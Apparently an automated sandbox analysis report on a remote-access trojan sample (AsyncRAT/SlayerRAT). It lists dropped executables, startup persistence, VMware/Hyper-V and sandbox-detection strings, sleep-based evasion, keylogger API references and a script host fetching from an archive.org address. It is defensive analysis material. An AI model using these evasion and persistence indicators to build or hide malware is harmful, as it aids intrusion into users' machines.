Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AsyncRAT

Show sources

Source: Yara match	File source: 0000000C.00000000.429733559.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.599252774.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.601243946.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tmp87E4.tmp.exe PID: 5036, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe, type: DROPPED
Source: Yara match	File source: 12.0.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: tmp87E4.tmp.exe, tmp87E4.tmp.exe.2.dr

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\AppData\Local\Temp\pgr.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Window / User API: threadDelayed 5377	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Window / User API: threadDelayed 703	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Window / User API: threadDelayed 5808	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Window / User API: threadDelayed 684	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Window / User API: threadDelayed 9071	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Tmp.exe TID: 2272	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe TID: 4188	Thread sleep count: 5808 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe TID: 3084	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe TID: 340	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe TID: 4148	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe TID: 4148	Thread sleep count: 90 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe TID: 476	Thread sleep count: 684 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe TID: 476	Thread sleep count: 9071 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 1236	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 4132	Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 5052	Thread sleep time: -140000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 3548	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 3548	Thread sleep time: -1100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 3548	Thread sleep time: -200000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 5368	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 3548	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\servieda.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\servieda.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 14_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,

14_2_00406EC3

Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Thread delayed: delay time: 120000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Thread delayed: delay time: 140000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Thread delayed: delay time: 922337203685477

Source: wscript.exe, 00000000.00000002.373872355.000001B866570000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWX
Source: wscript.exe, 00000000.00000002.374755417.000001B866F40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.610124261.000000001AF20000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.611349583.00000000054E0000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.614934785.0000000007300000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: tmp87E4.tmp.exe.2.dr	Binary or memory string: vmware
Source: Tmp.exe, 00000001.00000002.368050117.0000000000690000.00000004.00000020.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}
Source: servieda.exe, 00000003.00000002.600571668.000000000067B000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
Source: wscript.exe, 00000000.00000003.342673260.000001B8665AF000.00000004.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.610746899.0000000005046000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000002.374755417.000001B866F40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.610124261.000000001AF20000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.611349583.00000000054E0000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.614934785.0000000007300000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.374755417.000001B866F40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.610124261.000000001AF20000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.611349583.00000000054E0000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.614934785.0000000007300000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000002.374755417.000001B866F40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.610124261.000000001AF20000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.611349583.00000000054E0000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.614934785.0000000007300000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: tmpFB21.tmp.exe, 0000000D.00000002.601888472.0000000001070000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllNN

Source: C:\Users\user\AppData\Roaming\servieda.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 14_2_00403C3D LoadLibraryA,GetProcAddress,strcpy,

14_2_00403C3D

Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\Tmp.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files

Show sources

Source: C:\Windows\System32\wscript.exe

File created: Tmp.exe.0.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\System32\wscript.exe	Domain query: ia601504.us.archive.org
Source: C:\Windows\System32\wscript.exe	Network Connect: 207.241.227.114 187			Jump to behavior

.NET source code references suspicious native API functions

Show sources

Source: Tmp.exe.0.dr, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: Tmp.exe.0.dr, SlayerRAT.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: servieda.exe.1.dr, SlayerRAT.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: servieda.exe.1.dr, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 1.0.Tmp.exe.1d0000.0.unpack, SlayerRAT.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 1.0.Tmp.exe.1d0000.0.unpack, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 1.2.Tmp.exe.1d0000.0.unpack, SlayerRAT.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 1.2.Tmp.exe.1d0000.0.unpack, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
